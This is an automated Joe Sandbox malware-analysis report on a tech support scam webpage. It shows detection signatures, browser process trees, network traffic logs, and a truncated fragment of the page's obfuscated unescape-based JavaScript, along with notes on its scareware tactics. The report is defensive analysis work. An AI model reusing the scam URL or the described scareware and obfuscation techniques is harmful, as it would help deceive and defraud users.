Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/

Overview

General Information

Sample URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/
Analysis ID:1447449
Infos:

Detection

TechSupportScam
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected TechSupportScam
AI detected suspicious javascript
HTML page contains obfuscate javascript

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 7108 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 2064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2336,i,16897926013340599642,15808530156827528481,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 3564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

HTML

SourceRuleDescriptionAuthorStrings
1.0.pages.csvJoeSecurity_TechSupportScamYara detected TechSupportScamJoe Security
    1.2.pages.csvJoeSecurity_TechSupportScamYara detected TechSupportScamJoe Security
      1.3.pages.csvJoeSecurity_TechSupportScamYara detected TechSupportScamJoe Security
        1.1.pages.csvJoeSecurity_TechSupportScamYara detected TechSupportScamJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/Avira URL Cloud: detection malicious, Label: malware
          Source: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/SlashNext: detection malicious, Label: Scareware type: Phishing & Social usering

          Phishing

          barindex
          Yara detected TechSupportScam
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Source: Yara matchFile source: 1.2.pages.csv, type: HTML
          Source: Yara matchFile source: 1.3.pages.csv, type: HTML
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          AI detected suspicious javascript
          Source: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/#LLM: Score: 9 Reasons: The provided JavaScript code uses the 'unescape' function to decode a long, obfuscated string. This technique is commonly used to hide malicious payloads, making it difficult to determine the intent of the code without further analysis. The use of obfuscation raises significant red flags and suggests a high risk of malicious activity. DOM: 1.0.pages.csv
          Source: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/#LLM: Score: 8 Reasons: The JavaScript code appears to simulate system file paths and executable names, which can be used to create a sense of urgency or fear in users, potentially leading to phishing or scam activities. The code manipulates HTML elements to display these paths and changes their styles, which is typical in scareware tactics. Additionally, the use of sound (document.getElementById('beep').play()) can further enhance the scare tactic. While the code itself does not directly perform malicious actions, its behavior is highly suspicious and indicative of potentially malicious intent. DOM: 1.0.pages.csv
          HTML page contains obfuscate javascript
          Source: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/#HTTP Parser: function eval1() { var s1 = unescape("o%7Ewl%7Drxw.%3B9n%7Fju%3B.%3BA.%3BB.@K%7Fj%7B.%3B9%7
          Source: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/#HTTP Parser: function eval1() { var s1 = unescape("o%7Ewl%7Drxw.%3B9n%7Fju%3B.%3BA.%3BB.@K%7Fj%7B.%3B9%7
          Source: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/#HTTP Parser: function eval1() { var s1 = unescape("o%7Ewl%7Drxw.%3B9n%7Fju%3B.%3BA.%3BB.@K%7Fj%7B.%3B9%7
          Source: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/#HTTP Parser: function eval1() { var s1 = unescape("o%7Ewl%7Drxw.%3B9n%7Fju%3B.%3BA.%3BB.@K%7Fj%7B.%3B9%7
          Source: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/#HTTP Parser: No favicon
          Source: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/#HTTP Parser: No favicon
          Source: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/#HTTP Parser: No favicon
          Source: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/#HTTP Parser: No favicon
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49731 version: TLS 1.2
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /font-awesome/4.5.0/css/font-awesome.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /bootstrap/4.5.2/css/bootstrap.min.css HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /bootstrap/4.5.2/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /ajax/libs/froala-editor/2.8.5/css/froala_style.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /font-awesome/4.5.0/fonts/fontawesome-webfont.woff2?v=4.5.0 HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: chromecache_95.2.drString found in binary or memory: Math.round(p);u["gtm.videoCurrentTime"]=Math.round(q);u["gtm.videoElapsedTime"]=Math.round(f);u["gtm.videoPercent"]=r;u["gtm.videoVisible"]=t;return u},bk:function(){e=Db()},pd:function(){d()}}};var ic=ma(["data-gtm-yt-inspected-"]),GC=["www.youtube.com","www.youtube-nocookie.com"],HC,IC=!1; equals www.youtube.com (Youtube)
          Source: chromecache_95.2.drString found in binary or memory: c?"runIfCanceled":"runIfUncanceled",[]);if(!g.length)return!0;var h=oA(a,c,e);P(121);if("https://www.facebook.com/tr/"===h["gtm.elementUrl"])return P(122),!0;if(d&&f){for(var m=Nb(b,g.length),n=0;n<g.length;++n)g[n](h,m);return m.done}for(var p=0;p<g.length;++p)g[p](h,function(){});return!0},rA=function(){var a=[],b=function(c){return tb(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c);return d?d.button:null}}}, equals www.facebook.com (Facebook)
          Source: chromecache_95.2.drString found in binary or memory: e||f||g.length||h.length))return;var n={Wg:d,Ug:e,Vg:f,Lh:g,Mh:h,xe:m,Ab:b},p=G.YT,q=function(){OC(n)};if(p)return p.ready&&p.ready(q),b;var r=G.onYouTubeIframeAPIReady;G.onYouTubeIframeAPIReady=function(){r&&r();q()};I(function(){for(var t=H.getElementsByTagName("script"),v=t.length,u=0;u<v;u++){var w=t[u].getAttribute("src");if(RC(w,"iframe_api")||RC(w,"player_api"))return b}for(var y=H.getElementsByTagName("iframe"),x=y.length,B=0;B<x;B++)if(!IC&&PC(y[B],n.xe))return yc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
          Source: chromecache_95.2.drString found in binary or memory: var TB=function(a,b,c,d,e){var f=Mz("fsl",c?"nv.mwt":"mwt",0),g;g=c?Mz("fsl","nv.ids",[]):Mz("fsl","ids",[]);if(!g.length)return!0;var h=Rz(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);P(121);if("https://www.facebook.com/tr/"===m)return P(122),!0;h["gtm.elementUrl"]=m;h["gtm.formCanceled"]=c;null!=a.getAttribute("name")&&(h["gtm.interactedFormName"]=a.getAttribute("name"));e&&(h["gtm.formSubmitElement"]=e,h["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!yy(h,zy(b, equals www.facebook.com (Facebook)
          Source: global trafficDNS traffic detected: DNS query: forwigjoeeiorjegoeirjhhjeri.azurewebsites.net
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
          Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
          Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
          Source: chromecache_85.2.drString found in binary or memory: http://fontawesome.io
          Source: chromecache_85.2.drString found in binary or memory: http://fontawesome.io/license
          Source: chromecache_95.2.drString found in binary or memory: https://adservice.google.com/pagead/regclk
          Source: chromecache_95.2.drString found in binary or memory: https://adservice.googlesyndication.com/pagead/regclk
          Source: chromecache_95.2.drString found in binary or memory: https://cct.google/taggy/agent.js
          Source: chromecache_67.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/froala-editor/2.8.5/css/froala_style.min.css
          Source: chromecache_80.2.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Poppins:ital
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiAyp8kv8JHgFVrJJLmE0tCMPI.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiAyp8kv8JHgFVrJJLmE0tMMPKzSQ.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLBT5Z1JlFc-K.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLBT5Z1xlFQ.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLCz7Z1JlFc-K.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLCz7Z1xlFQ.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLDD4Z1JlFc-K.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLDD4Z1xlFQ.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLDz8Z1JlFc-K.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLDz8Z1xlFQ.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1JlFc-K.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLFj_Z1JlFc-K.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLFj_Z1xlFQ.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLGT9Z1JlFc-K.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLGT9Z1xlFQ.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLm111VF9eO.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLm111VGdeOcEg.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLm21lVF9eO.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLm21lVGdeOcEg.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLm81xVF9eO.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLm81xVGdeOcEg.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLmg1hVF9eO.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLmg1hVGdeOcEg.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLmr19VF9eO.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLmr19VGdeOcEg.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLmv1pVF9eO.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLmv1pVGdeOcEg.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLmy15VF9eO.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLmy15VGdeOcEg.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiEyp8kv8JHgFVrJJfecg.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiEyp8kv8JHgFVrJJnecmNE.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiGyp8kv8JHgFVrJJLucHtA.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiGyp8kv8JHgFVrJJLufntAKPY.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiGyp8kv8JHgFVrLPTucHtA.woff2)
          Source: chromecache_93.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiGyp8kv8JHgFVrLPTufntAKPY.woff2)
          Source: chromecache_105.2.drString found in binary or memory: https://froala.com/wysiwyg-editor/terms/
          Source: chromecache_58.2.dr, chromecache_63.2.drString found in binary or memory: https://getbootstrap.com/)
          Source: chromecache_58.2.dr, chromecache_63.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
          Source: chromecache_63.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
          Source: chromecache_67.2.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css
          Source: chromecache_95.2.drString found in binary or memory: https://pagead2.googlesyndication.com
          Source: chromecache_95.2.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
          Source: chromecache_67.2.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css
          Source: chromecache_67.2.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
          Source: chromecache_95.2.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect
          Source: chromecache_95.2.drString found in binary or memory: https://td.doubleclick.net
          Source: chromecache_105.2.drString found in binary or memory: https://www.froala.com/wysiwyg-editor)
          Source: chromecache_95.2.drString found in binary or memory: https://www.google.com
          Source: chromecache_95.2.drString found in binary or memory: https://www.googleadservices.com
          Source: chromecache_95.2.drString found in binary or memory: https://www.googletagmanager.com
          Source: chromecache_67.2.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-WGPCQTD2D9
          Source: chromecache_95.2.drString found in binary or memory: https://www.merchant-center-analytics.goog
          Source: chromecache_95.2.drString found in binary or memory: https://www.youtube.com/iframe_api
          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49731 version: TLS 1.2

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Yara detected TechSupportScam
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Source: Yara matchFile source: 1.2.pages.csv, type: HTML
          Source: Yara matchFile source: 1.3.pages.csv, type: HTML
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: classification engineClassification label: mal64.phis.win@16/99@12/6
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2336,i,16897926013340599642,15808530156827528481,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2336,i,16897926013340599642,15808530156827528481,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
          Process Injection          		1
          Process Injection          		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
          Non-Application Layer Protocol          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
          Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
          Ingress Tool Transfer          		Traffic DuplicationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/100%Avira URL Cloudmalware
          https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/100%SlashNextScareware type: Phishing & Social usering

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://www.youtube.com/iframe_api0%URL Reputationsafe
          http://fontawesome.io0%URL Reputationsafe
          https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css0%URL Reputationsafe
          https://stats.g.doubleclick.net/g/collect0%URL Reputationsafe
          https://td.doubleclick.net0%URL Reputationsafe
          https://www.merchant-center-analytics.goog0%URL Reputationsafe
          https://froala.com/wysiwyg-editor/terms/0%URL Reputationsafe
          https://getbootstrap.com/)0%URL Reputationsafe
          https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/fonts/fontawesome-webfont.woff2?v=4.5.00%URL Reputationsafe
